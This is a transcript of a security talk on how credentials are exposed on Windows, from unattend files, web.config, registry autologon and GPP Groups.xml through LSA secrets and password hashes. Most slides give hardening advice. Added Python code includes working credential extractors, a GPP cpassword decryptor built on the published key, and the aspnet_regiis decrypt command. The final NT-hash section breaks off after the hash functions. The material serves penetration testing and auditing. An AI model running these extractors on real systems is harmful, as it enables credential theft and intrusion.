Extracting Credentials From Windows

Scott Sutherland and Antti Rantasaari, NetSPI (Sec360 presentation)
Transcript

  • 1. Like what you hear? Tweet it using: #Sec360
  • 2. INTRODUCTIONS Who are we? • Scott Sutherland • Antti Rantasaari What do we do? • Network and application penetration testing at NetSPI
  • 3. GOAL Provide a basic understanding of how passwords can be exposed on Windows systems • What are the controls? • What are their limitations? • How can we reduce risk?
  • 4. OVERVIEW How to steal credentials from Microsoft technologies: • Password Storage • Cleartext passwords • Encrypted passwords • Password hashes • Authentication tokens
  • 5. PASSWORD STORAGE
    • Hashed passwords
      - Used when the cleartext password is not required later
      - No key required; the hashing process can't be reversed
    • Encrypted passwords
      - Used when the cleartext password will be required later
      - Requires a key to decrypt the password
      - Requires key management
    • Encoded passwords
      - Should not be used to protect passwords
      - No key required to decode the password
    • Cleartext passwords – Don't do that!
  • 6. CLEARTEXT PASSWORDS
    Why does it matter if passwords are stored or transmitted in cleartext?
    • Vulnerabilities can provide read-only access to:
      - OS files, backup files, and file shares
      - Network traffic
    • Passwords can then be used to access:
      - Systems
      - Applications / databases
      - Sensitive information
  • 7. CLEARTEXT PASSWORDS
    Why does it matter if passwords are stored or transmitted in cleartext?
    • Vulnerability examples:
      - File traversal
      - Local file includes
      - Excessive privileges on shares
      - ARP MITM
  • 8. CLEARTEXT PASSWORDS Where can I find cleartext passwords? • Mapped network drives – User files • Configuration files • Windows Registry • Active Directory • Websites • Script files • Log files
  • 9. CLEARTEXT PASSWORDS: Mapped Network Drives
    • Users have access to a ton of file shares
    • File shares often have bad ACLs
    • Users love to store passwords in files
      - xls files
      - doc files
      - txt files
      - etc…
  • 10. CLEARTEXT PASSWORDS: Mapped Network Drives
    • Easy to find passwords using:
      - Find
      - Grep
      - Spider
      - Notepad++
      - etc…
  • 11. CLEARTEXT PASSWORDS: Mapped Network Drives (Recommendations)
    • Review shares for passwords at regular intervals
    • Periodic audits of access controls on shares
    • User awareness training
    • Use proper password storage
  • 12. CLEARTEXT PASSWORDS: Configuration Files
    • Sometimes config files are only accessible to administrators
    • Most config files are accessible to all users
      - Bad ACLs
      - Access to backups
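As an added example (not part of the original slides), here is a small Python scanner that does what the Find/Grep/Spider step above does by hand: it walks a share root, greps likely credential patterns out of text-based files, and masks the secret in its report so the findings file does not itself become a password list. The share contents, file names and regex patterns are constructed for the demo; on a real engagement you point `scan_tree()` at the mapped drive.

```python
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Patterns a tester (or an auditor) greps shares for. The secret is the last group
# so the report can mask it instead of copying credentials into the findings.
PASSWORD_PATTERNS = [
    re.compile(r"(?i)\b(password|passwd|pwd)\s*[:=]\s*[\"']?([^\s\"';<]+)"),  # key: value / key=value
    re.compile(r"(?i)\bPassword=([^;\"]+)"),                                  # connection strings
    re.compile(r"<Value>([A-Za-z0-9+/=]+)</Value>"),                          # unattend.xml value blobs
]
# File types worth reading as text; Office binaries are skipped here (convert them first).
SCAN_EXTENSIONS = {".txt", ".xml", ".config", ".ini", ".ps1", ".bat", ".cmd", ".vbs", ".log", ".csv"}


def mask(secret: str) -> str:
    """Keep the first two characters so a hit is recognisable without being reusable."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_file(path: str) -> List[Tuple[int, str, str]]:
    """Return (line number, trimmed line, masked secret) for each matching line."""
    hits = []
    try:
        with open(path, "r", encoding="utf-8", errors="ignore") as fh:
            for lineno, line in enumerate(fh, 1):
                for pattern in PASSWORD_PATTERNS:
                    match = pattern.search(line)
                    if match:
                        hits.append((lineno, line.strip()[:80], mask(match.group(match.lastindex))))
                        break
    except OSError:
        pass  # unreadable file: the ACL did its job for once
    return hits


def scan_tree(root: str) -> Dict[str, List[Tuple[int, str, str]]]:
    """Walk a mapped drive or share root and collect hits per file."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in SCAN_EXTENSIONS:
                full = os.path.join(dirpath, name)
                hits = scan_file(full)
                if hits:
                    findings[full] = hits
    return findings


def build_sample_share() -> str:
    """Constructed stand-in for a mapped drive (not real data) so this runs offline."""
    root = tempfile.mkdtemp(prefix="share_")
    samples = {
        "IT/servers.txt": "backup server: 10.0.0.5\nuser: svc_backup\npassword: Summer2014!\n",
        "IT/app/web.config": '<connectionStrings><add name="db" connectionString="Server=sql1;User Id=sa;Password=S3cret;"/></connectionStrings>\n',
        "HR/holidays.txt": "Jan 1 New Year\nDec 25 Christmas\n",
        "deploy/unattend.xml": "<AdministratorPassword><Value>UGFzc3cwcmQ=</Value><PlainText>true</PlainText></AdministratorPassword>\n",
    }
    for rel, text in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(text)
    return root


if __name__ == "__main__":
    for path, hits in scan_tree(build_sample_share()).items():
        for lineno, context, masked in hits:
            print(f"{path}:{lineno}: {masked}    {context}")
```

The same scanner doubles as the "review shares for passwords at regular intervals" control: run it from a scheduled job as a low-privilege account, and anything it finds is readable by every user with the same share access.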
  • 13. CLEARTEXT PASSWORDS Configuration Files – Sysprep • Files created to support the automation of large scale image roll outs • Configuration settings • Local and domain credentials
  • 14. CLEARTEXT PASSWORDS Configuration Files – Sysprep • Files can be read by ANY user on the system • There are many places they can be stored and used
  • 15. CLEARTEXT PASSWORDS: Configuration Files – Sysprep
    http://technet.microsoft.com/en-us/library/cc749415%28v=ws.10%29.aspx
    Locations where answer files are stored and picked up (in search order):
    Type      Location
    Registry  HKLM\System\Setup!UnattendFile
    File      %WINDIR%\Panther\Unattend
    File      %WINDIR%\Panther
    File      Removable read/write media, in order of drive letter, at the root of the drive
    File      Removable read-only media, in order of drive letter, at the root of the drive
    File      windowsPE and offlineServicing passes: Sources directory in a Windows distribution;
              all other passes: %WINDIR%\System32\Sysprep
    File      %SYSTEMDRIVE%
  • 16. CLEARTEXT PASSWORDS Configuration Files – Sysprep • Most of the time they are stored with no protection… http://technet.microsoft.com/en-us/library/cc749415%28v=ws.10%29.aspx
  • 17. CLEARTEXT PASSWORDS: Unattend and Sysprep Files
    http://technet.microsoft.com/en-us/library/cc749415%28v=ws.10%29.aspx
    Unattend.xml Example – Cleartext
    …[snip]…
    <OOBE>
      <HideEULAPage>true</HideEULAPage>
      <NetworkLocation>Work</NetworkLocation>
      <ProtectYourPC>1</ProtectYourPC>
      <SkipMachineOOBE>true</SkipMachineOOBE>
      <SkipUserOOBE>true</SkipUserOOBE>
    </OOBE>
    <UserAccounts>
      <AdministratorPassword>
        <Value>Passw0rd</Value>
        <PlainText>true</PlainText>
      </AdministratorPassword>
    </UserAccounts>
    </component>
    …[snip]…
  • 18. CLEARTEXT PASSWORDS Configuration Files – Sysprep • Sometimes they are Base64 encoded… http://technet.microsoft.com/en-us/library/cc749415%28v=ws.10%29.aspx
  • 19. CLEARTEXT PASSWORDS: Unattend and Sysprep Files
    http://technet.microsoft.com/en-us/library/cc749415%28v=ws.10%29.aspx
    Unattend.xml Example – Base64 Encoded
    …[snip]…
    <OOBE>
      <HideEULAPage>true</HideEULAPage>
      <NetworkLocation>Work</NetworkLocation>
      <ProtectYourPC>1</ProtectYourPC>
      <SkipMachineOOBE>true</SkipMachineOOBE>
      <SkipUserOOBE>true</SkipUserOOBE>
    </OOBE>
    <UserAccounts>
      <AdministratorPassword>
        <Value>UGFzc3cwcmQ=</Value>
        <PlainText>true</PlainText>
      </AdministratorPassword>
    </UserAccounts>
    </component>
    …[snip]…
  • 20. CLEARTEXT PASSWORDS Configuration Files – Sysprep • Sometimes they are Base64 encoded… Base64 Encoding != Encryption http://technet.microsoft.com/en-us/library/cc749415%28v=ws.10%29.aspx
  • 21. CLEARTEXT PASSWORDS Unattend and Sysprep Files http://technet.microsoft.com/en-us/library/cc749415%28v=ws.10%29.aspx
  • 22. CLEARTEXT PASSWORDS: Configuration Files – Sysprep (Recommendations)
    • Configure roll-out scripts to remove the sysprep answer files, like unattend.xml
    • Additional notes:
      - Prevent remote logins by local administrators
      - Manage systems with domain groups
  • 23. CLEARTEXT PASSWORDS Configuration Files – Web.config • Used to store IIS web application configurations • Often contain database passwords • By default passwords are cleartext
  • 24. CLEARTEXT PASSWORDS Configuration Files – Web.config • Typically stored at the webroot for each IIS site • Usually can be read by all users on the system
  • 25. CLEARTEXT PASSWORDS: Configuration Files – Web.config (Recommendations)
    • Encrypt passwords stored in web.config:
      aspnet_regiis.exe -pef "connectionStrings" c:\webapp
    • Additional notes:
      - Configure strong ACLs on the file system
  • 26. CLEARTEXT PASSWORDS Configuration Files – Web.config Recommendations
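Added example, not from the slides: a Python parser for the two file types just discussed. For unattend.xml / sysprep.xml it pulls every account password out of `<AdministratorPassword>` and `<LocalAccount><Password>` elements, handling the PlainText=true case shown on the slide and the PlainText=false case, where Windows base64-encodes UTF-16LE(password + element name); that appended suffix ("AdministratorPassword" or "Password") is documented Windows behaviour the slides do not cover. For web.config it flags `<connectionStrings>` entries that still carry a password and treats a section with a `configProtectionProvider` attribute (what `aspnet_regiis -pef` produces) as already protected. Both sample documents are constructed, and the base64-decode attempt for PlainText=true is an assumption about sloppy deployment tooling, not a Microsoft rule.

```python
import base64
import re
import xml.etree.ElementTree as ET
from typing import Dict, List


def _local(tag: str) -> str:
    """Drop the urn:schemas-microsoft-com:unattend namespace from a tag."""
    return tag.split("}", 1)[-1]


def encode_unattend_password(password: str, element: str) -> str:
    """What Windows does for PlainText=false: base64(UTF-16LE(password + element name))."""
    return base64.b64encode((password + element).encode("utf-16-le")).decode("ascii")


def decode_unattend_password(value: str, plaintext: bool, element: str) -> str:
    """Recover the cleartext from a <Value> element."""
    if not plaintext:
        text = base64.b64decode(value).decode("utf-16-le")
        return text[:-len(element)] if text.endswith(element) else text
    # PlainText=true should be the password itself, but some tooling still base64-wraps
    # it (as on the slide above). Heuristic (assumption): try a decode, and if the result
    # is not printable ASCII the value was the password all along.
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
        if decoded.isprintable():
            return decoded
    except (ValueError, UnicodeDecodeError):
        pass
    return value


def extract_unattend_passwords(xml_text: str) -> List[Dict[str, object]]:
    """Every account password in an unattend.xml / sysprep.xml, in document order."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    found = []
    for el in root.iter():
        name = _local(el.tag)
        if name not in ("AdministratorPassword", "Password"):
            continue
        kids = {_local(c.tag): (c.text or "").strip() for c in el}
        if "Value" not in kids:
            continue
        plaintext = kids.get("PlainText", "true").lower() == "true"
        account = "Administrator"
        if name == "Password":                      # the enclosing <LocalAccount> carries <Name>
            parent = parents.get(el)
            names = [(c.text or "").strip() for c in parent if _local(c.tag) == "Name"] if parent is not None else []
            account = names[0] if names else "?"
        found.append({"account": account, "plaintext": plaintext,
                      "password": decode_unattend_password(kids["Value"], plaintext, name)})
    return found


def cleartext_connection_strings(xml_text: str) -> List[str]:
    """Names of <add> entries in <connectionStrings> that still carry a password.
    A section protected with aspnet_regiis -pef has a configProtectionProvider
    attribute and <EncryptedData> instead of <add> children, so it yields nothing."""
    names = []
    for section in ET.fromstring(xml_text).iter("connectionStrings"):
        if section.get("configProtectionProvider"):
            continue
        for add in section.findall("add"):
            if re.search(r"(?i)\b(password|pwd)\s*=", add.get("connectionString", "")):
                names.append(add.get("name", "?"))
    return names


# Constructed samples (not from a real deployment).
UNATTEND_SAMPLE = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <AdministratorPassword>
          <Value>UGFzc3cwcmQ=</Value>
          <PlainText>true</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Name>svc_deploy</Name>
            <Group>Administrators</Group>
            <Password>
              <Value>%s</Value>
              <PlainText>false</PlainText>
            </Password>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
""" % encode_unattend_password("Svc!2014", "Password")

WEBCONFIG_SAMPLE = """<configuration>
  <connectionStrings>
    <add name="Orders" connectionString="Server=sql1;Database=orders;User Id=app;Password=Winter2014;" />
    <add name="Reports" connectionString="Server=sql2;Integrated Security=SSPI;" />
  </connectionStrings>
</configuration>
"""

WEBCONFIG_ENCRYPTED = """<configuration>
  <connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider">
    <EncryptedData xmlns="http://www.w3.org/2001/04/xmlenc#"><CipherData><CipherValue>(omitted)</CipherValue></CipherData></EncryptedData>
  </connectionStrings>
</configuration>
"""

if __name__ == "__main__":
    for entry in extract_unattend_passwords(UNATTEND_SAMPLE):
        print(entry)
    print("cleartext connection strings:", cleartext_connection_strings(WEBCONFIG_SAMPLE))
    print("after aspnet_regiis -pef:", cleartext_connection_strings(WEBCONFIG_ENCRYPTED))
```

Run against the paths on slide 15 (the Panther directory, the Sysprep directory, the root of the system drive) and every IIS web root; an empty result from `cleartext_connection_strings` only means the section is encrypted, and as slide 79 notes a local administrator can still run `aspnet_regiis -pdf` to get it back.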
  • 27. CLEARTEXT PASSWORDS Basic Authentication • Simple way to implement IIS authentication • Uses Base64 encoding, NOT ENCRYPTION • Credentials can be captured from network traffic over HTTP, or via man-in-the-middle over HTTPS
  • 28. CLEARTEXT PASSWORDS Basic Authentication • Basic authentication over SSL is not that bad • Very common to see it used over unencrypted HTTP connections
  • 29. CLEARTEXT PASSWORDS: Basic Authentication
    • Base64 encoded:
      bmV0c3BpOlZlcnlTdHJvbmdBbmRIYXJkVG9HdWVzc1Bhc3N3b3Jk
    • Easily decoded from Base64:
      netspi:VeryStrongAndHardToGuessPassword
    • Common example: Microsoft ActiveSync (iPhone, etc.)
  • 30. CLEARTEXT PASSWORDS: Basic Authentication (Recommendations)
    • Basic Auth is simple, but not often necessary
    • Replace it with Integrated Authentication to enforce an authentication handshake
    • Additional notes:
      - Integrated Authentication can still be exploited, but it's not as easy
  • 31. CLEARTEXT PASSWORDS: Windows Registry
    • Many applications store passwords in cleartext
    • Easy to search for common strings to find passwords
    • Windows also stores some passwords in cleartext
      - Autologon username and password
  • 32. CLEARTEXT PASSWORDS: Windows Registry - AutoLogin
    • Used by many kiosk and POS systems
    • Often stores autologon credentials in:
      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
      "AutoAdminLogon"="1"
      "DefaultUserName"="autoadmin"
      "DefaultPassword"="!PassW0rd!"
      "DefaultDomainName"="acme"
  • 33. CLEARTEXT PASSWORDS Windows Registry - AutoLogin
  • 34. CLEARTEXT PASSWORDS: Windows Registry - AutoLogin (Recommendations)
    • Only use autologon when necessary
    • If required, store the credentials encrypted in LSASecrets (e.g. with the Sysinternals Autologon tool)
    • Additional notes:
      - The encrypted password can still be recovered with administrative access to the system
    http://technet.microsoft.com/en-us/sysinternals/bb963905.aspx
  • 35. CLEARTEXT PASSWORDS Active Directory • User Comments • Custom properties
  • 36. CLEARTEXT PASSWORDS: Active Directory (Recommendations)
    • Don't store cleartext passwords in Active Directory
    • Audit Active Directory periodically for comments and custom attributes that may contain passwords
  • 37. ENCRYPTED PASSWORDS How is it possible to decrypt passwords protected by Microsoft technologies? Key Point: If an application or OS can decrypt it, so can an attacker! …sometimes administrator access is required.
  • 38. ENCRYPTED PASSWORDS
    How is it possible to recover passwords encrypted by Microsoft technologies?
    • Calling native OS and application functions
    • Recovering encryption keys
      - From the same system as the protected data
      - From external systems like HSMs
    • Using the keys and the correct algorithm to recover the protected data
  • 39. ENCRYPTED PASSWORDS Groups.xml • Windows AD Group Policy Preferences allow setting passwords for local accounts on domain systems
  • 40. ENCRYPTED PASSWORDS Groups.xml • For that to work the password has to be sent to the user’s system • Groups.xml is pulled down from the SYSVOL share on the DC • SYSVOL and Groups.xml are accessible to all domain users and computer accounts
  • 41. ENCRYPTED PASSWORDS • Updating a user results in groups.xml file creation
  • 42. ENCRYPTED PASSWORDS
    • Passwords in groups.xml are AES256 encrypted and base64 encoded
    • To apply the password locally, the client has to decrypt it
    • To enable this, the encryption key is stored on clients
    • But MS released the STATIC key in an MSDN article; now anyone can decrypt the password!
    http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx#endNote2
  • 43. ENCRYPTED PASSWORDS
    • Groups.xml password decrypted with a simple PowerShell script
    https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
  • 44. ENCRYPTED PASSWORDS Groups.xml Recommendations • Microsoft does not recommend setting passwords via Group Policy so it’s not a good idea to do that • Access to groups.xml cannot be prevented for domain users so it should not be used
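Added example (not from the slides, and not PowerSploit's Get-GPPPassword, which does the same thing with .NET's AES class): decrypting a Groups.xml cpassword in Python with the published key. A compact AES-256-CBC implementation is included so it runs with no third-party packages; the IV is sixteen zero bytes and the plaintext is PKCS#7-padded UTF-16LE. The Groups.xml below is constructed; the cpassword in it is the sample value from the Get-GPPPassword help text.

```python
import base64
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published in the MS-GPPREF documentation (the "static key" on the slide).
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")


def _xtime(a):                      # multiply by x in GF(2^8)
    return ((a << 1) ^ 0x1b) & 0xff if a & 0x80 else a << 1


def _mul(a, b):                     # general GF(2^8) multiplication
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r


def _make_sboxes():
    """Build the S-box (inverse in GF(2^8), then the affine map) and its inverse."""
    sbox = [0] * 256
    for x in range(256):
        inv = next((y for y in range(1, 256) if _mul(x, y) == 1), 0)
        s = inv
        for _ in range(4):
            inv = ((inv << 1) | (inv >> 7)) & 0xff
            s ^= inv
        sbox[x] = s ^ 0x63
    return sbox, [sbox.index(v) for v in range(256)]


SBOX, INV_SBOX = _make_sboxes()


def _round_keys(key):
    """FIPS-197 key expansion for a 256-bit key: 60 words, 15 round keys."""
    w = [list(key[i:i + 4]) for i in range(0, 32, 4)]
    rcon = 1
    for i in range(8, 60):
        t = list(w[i - 1])
        if i % 8 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= rcon
            rcon = _xtime(rcon)
        elif i % 8 == 4:
            t = [SBOX[b] for b in t]
        w.append([w[i - 8][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(15)]


def _inv_mix_column(c):
    a0, a1, a2, a3 = c
    return [_mul(a0, 14) ^ _mul(a1, 11) ^ _mul(a2, 13) ^ _mul(a3, 9),
            _mul(a0, 9) ^ _mul(a1, 14) ^ _mul(a2, 11) ^ _mul(a3, 13),
            _mul(a0, 13) ^ _mul(a1, 9) ^ _mul(a2, 14) ^ _mul(a3, 11),
            _mul(a0, 11) ^ _mul(a1, 13) ^ _mul(a2, 9) ^ _mul(a3, 14)]


def _decrypt_block(rk, block):
    """FIPS-197 inverse cipher on one 16-byte block (state is column-major)."""
    s = [b ^ k for b, k in zip(block, rk[14])]
    for rnd in range(13, -1, -1):
        s = [s[i % 4 + 4 * ((i // 4 - i % 4) % 4)] for i in range(16)]   # InvShiftRows
        s = [INV_SBOX[b] ^ k for b, k in zip(s, rk[rnd])]                # InvSubBytes + AddRoundKey
        if rnd:
            s = sum((_inv_mix_column(s[4 * c:4 * c + 4]) for c in range(4)), [])
    return bytes(s)


def aes256_cbc_decrypt(key, iv, data):
    rk, prev, out = _round_keys(key), iv, b""
    for i in range(0, len(data), 16):
        block = data[i:i + 16]
        out += bytes(p ^ c for p, c in zip(_decrypt_block(rk, block), prev))
        prev = block
    return out


def decrypt_cpassword(cpassword):
    """GPP strips the base64 '=' padding, so restore it; then AES-CBC, zero IV, PKCS#7, UTF-16LE."""
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    padded = aes256_cbc_decrypt(GPP_KEY, bytes(16), raw)
    return padded[:-padded[-1]].decode("utf-16-le")


def gpp_passwords(groups_xml):
    """(userName, cleartext) for every <Properties> element that carries a cpassword."""
    out = []
    for props in ET.fromstring(groups_xml).iter("Properties"):
        if props.get("cpassword"):
            out.append((props.get("userName") or props.get("newName") or "?",
                        decrypt_cpassword(props.get("cpassword"))))
    return out


# Constructed Groups.xml; the cpassword is the sample value from Get-GPPPassword's help text.
GROUPS_XML_SAMPLE = """<Groups>
  <User name="LocalAdmin" changed="2014-05-01 12:00:00">
    <Properties action="U" newName="" fullName="" description="" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"
                cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for user, password in gpp_passwords(GROUPS_XML_SAMPLE):
        print(f"{user}: {password}")
```

Any domain user can read the XML this parses from `\\<domain>\SYSVOL\<domain>\Policies\...\Preferences\Groups\Groups.xml`; the same cpassword attribute also appears in the Services, ScheduledTasks, DataSources and Drives preference files, so search all of them, not just Groups.xml.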
  • 45. ENCRYPTED PASSWORDS: LSASecrets
    • Used to store all kinds of passwords
      - Service accounts
      - Autologon
      - Applications
  • 46. ENCRYPTED PASSWORDS: LSASecrets
    • Passwords are stored encrypted in the registry under HKLM:\SECURITY\Policy\Secrets
    • Only viewable by LocalSystem
    • But… administrators can become LocalSystem
  • 47. ENCRYPTED PASSWORDS: LSASecrets (screenshots: the Secrets key as seen with Administrator access vs. with LocalSystem access)
  • 48. ENCRYPTED PASSWORDS: LSASecrets
    • Additional information is also required from the subkeys of HKLM:\SECURITY\Policy
  • 49. ENCRYPTED PASSWORDS LSASecrets • Use native API methods to decrypt the secrets LsaRetrievePrivateData LsaStorePrivateData LsaOpenPolicy LsaNtStatusToWinError LsaClose LsaFreeMemory
  • 50. ENCRYPTED PASSWORDS LSASecrets – Service Account Example
  • 51. ENCRYPTED PASSWORDS: WDigest
    • Designed for use with protocols that require a cleartext password to authenticate:
      - Hypertext Transfer Protocol (HTTP)
      - Simple Authentication and Security Layer (SASL) exchanges
    http://technet.microsoft.com/en-us/library/cc778868(v=ws.10).aspx
    http://www.slideshare.net/gentilkiwi
  • 52. ENCRYPTED PASSWORDS WDigest • Stores passwords for interactive logins (like RDP) encrypted in the lsass.exe process • Depending on secret size and OS version RC4, DES, or AES is used http://technet.microsoft.com/en-us/library/cc778868(v=ws.10).aspx http://www.slideshare.net/gentilkiwi
  • 53. ENCRYPTED PASSWORDS WDigest • After injecting into the lsass.exe process or importing initialized keys via lsasrv.dll… • Native functions from lsasrv.dll can be used to decrypt the passwords – namely… LsaUnprotectMemory http://www.slideshare.net/gentilkiwi http://msdn.microsoft.com/en-us/library/windows/desktop/ff714510(v=vs.85).aspx
  • 54. ENCRYPTED PASSWORDS WDigest • Tools like Mimikatz and WCE can be used to recover cleartext passwords http://www.slideshare.net/gentilkiwi http://msdn.microsoft.com/en-us/library/windows/desktop/ff714510(v=vs.85).aspx
  • 55. ENCRYPTED PASSWORDS: WDigest (Recommendations)
    • Use smartcards or biometrics when possible
    • Use network logons instead of interactive logons when possible
    • Use unprivileged accounts when possible
    • Do not give admin / system / debug privileges to users
    http://www.slideshare.net/gentilkiwi
  • 56. ENCRYPTED PASSWORDS: DPAPI
    • Windows Data Protection API (DPAPI)
    • Standard / easy way on Windows to encrypt and decrypt data
    • DPAPI is used by many applications
      - IE, Chrome, Skype, EFS certificates, WEP / WPA keys, RDP passwords, Credential Manager
    • Data protection in memory or on disk
  • 57. ENCRYPTED PASSWORDS: DPAPI – stored data
    • Two protection scopes: CurrentUser or LocalMachine
    • The protection scope determines the encryption keys
      - CurrentUser scope uses keys protected by the current user's password
      - LocalMachine scope uses keys on the system
    • Additional entropy can be supplied by the caller to strengthen protection
  • 58. ENCRYPTED PASSWORDS: DPAPI - internals
    • Largely undocumented by Microsoft – just the API calls are fully documented
    • DPAPI has been reversed and offline decryption tools have been released
    http://passcape.com/index.php?section=blog&cmd=details&id=20#11
    http://www.elie.net/publication/reversing-dpapi-and-stealing-windows-secrets-offline#.U3BnB_ldWDs
  • 59. ENCRYPTED PASSWORDS MSSQL Links - Background • Microsoft SQL Server allows users to create links to external data sources, typically to SQL Servers • Links can be configured to use SQL server credentials • Cleartext passwords are needed to connect to linked servers – password hashing cannot be used
  • 60. ENCRYPTED PASSWORDS MSSQL Links - Background
  • 61. ENCRYPTED PASSWORDS MSSQL Links – Password Storage • Linked server passwords stored in the database – only accessible using DAC • Passwords stored in pwdhash column even though hashing is not used • Passwords encrypted but SQL Server must have the key
  • 62. ENCRYPTED PASSWORDS MSSQL Links – Password Storage
  • 63. ENCRYPTED PASSWORDS MSSQL Links – Service Master Key • SQL Server has a Service Master Key which is encrypted using DPAPI • Additional entropy is stored in the registry • Service Master Key is “the root of the SQL Server encryption hierarchy”, used to encrypt linked server passwords too
  • 64. ENCRYPTED PASSWORDS MSSQL Links – Service Master Key
  • 65. ENCRYPTED PASSWORDS MSSQL Links – Passwords Decryption • Decrypt Service Master Key using DPAPI • Extract encrypted password from database • Remove metadata from the password • Decrypt password using Service Master Key (either 3DES or AES depending on version)
  • 66. ENCRYPTED PASSWORDS MSSQL Links – Passwords Decrypted
  • 67. ENCRYPTED PASSWORDS MSSQL Links Recommendations • Best practice is to use Windows authentication only – do not enable SQL server authentication • Configure linked servers to use current execution context rather than saved credentials
  • 68. ENCRYPTED PASSWORDS Credential Manager / Vault • Credential Manager is intended to be a secure way to store password • Can be used for Windows credentials, browser credentials, application credentials • Each user has their own Vault – user can store own passwords
  • 69. ENCRYPTED PASSWORDS Credential Manager / Vault • Cleartext credentials needed to connect to remote systems – thus passwords in Cred Manager are encrypted, not hashed. • DPAPI used to encrypt passwords
  • 70. ENCRYPTED PASSWORDS Credential Manager / Vault
  • 71. ENCRYPTED PASSWORDS Credential Manager / Vault • Credential manager password decryption using Cain http://www.oxid.it/
  • 72. ENCRYPTED PASSWORDS: Credential Manager / Vault (Recommendations)
    • Stored passwords are always a security risk
    • Consider disabling Credential Manager using group policies
  • 73. ENCRYPTED PASSWORDS Wireless • Wireless connections with pre-shared keys have to store the passwords • Passwords encrypted using DPAPI • User or SYSTEM can access the stored passwords • Multiple tools to extract wireless credentials, including Metasploit
  • 74. ENCRYPTED PASSWORDS Wireless
  • 75. ENCRYPTED PASSWORDS Wireless Metasploit module: post/windows/wlan/wlan_profile
  • 76. ENCRYPTED PASSWORDS Wireless Recommendations • Do not use pre-shared keys • Configure corporate wireless to use WPA2- Enterprise (integrated authentication)
  • 77. ENCRYPTED PASSWORDS: Web.config and ApplicationHost.config
    • IIS application configuration files
    • Web.config = application level
    • ApplicationHost.config = server level
      - Application pool credentials
      - Windows credentials used for directory access
    … but they can also be decrypted
  • 78. ENCRYPTED PASSWORDS: Web.config and ApplicationHost.config
    • Earlier we saw this:
      aspnet_regiis.exe -pef "connectionStrings" c:\webapp
  • 79. ENCRYPTED PASSWORDS: Web.config and ApplicationHost.config
    • No surprise that local administrators can reverse it:
      aspnet_regiis.exe -pdf "connectionStrings" c:\webapp
  • 80. HASHED PASSWORDS
    Why should I care if someone steals my password hashes when I have complexity enabled?
    • #1 reason: password hashes can be replayed to authenticate without knowledge of the password
  • 81. HASHED PASSWORDS
    Why should I care if someone steals my password hashes when I have complexity enabled?
    • #2 reason: password hashes can be cracked at lightning speed using modern hardware and software
  • 82. PASSWORD HASHES On the System • Local / Domain LM hashes • Local / Domain NTLM hashes • Domain MS-CACHEv2 On the Network • Local / Domain NetLM • Local / Domain NetNTLM
  • 83. PASSWORD HASHES Can be dumped with a billion different hacker tools!
  • 84. DO I REALLY NEED PASSWORDS? Short answer is NO
  • 85. DO I REALLY NEED PASSWORDS? • SMB relay • Pass-the-hash • Stealing authentication tokens • Crawling database links • Process migration • Generating golden tickets
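Added example, not from the slides: why reason #1 on slide 80 holds. A minimal MD4 produces the NT hash, then an NTLMv2 challenge/response is built and verified from that hash alone (MS-NLMP section 3.3.2), so neither the client that replays it (pass-the-hash) nor the server that checks it ever touches the cleartext. The user, domain, challenges and target info are constructed values.

```python
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because many OpenSSL 3 builds drop it from hashlib."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xffffffff
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5a827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ed9eba1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[idx] + k) & 0xffffffff, shifts[i % 4])
                a, b, c, d = d, a, b, c          # rotate registers for the next step
        a, b, c, d = ((a + aa) & 0xffffffff, (b + bb) & 0xffffffff,
                      (c + cc) & 0xffffffff, (d + dd) & 0xffffffff)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)). No salt, so it is a password-equivalent."""
    return md4(password.encode("utf-16-le"))


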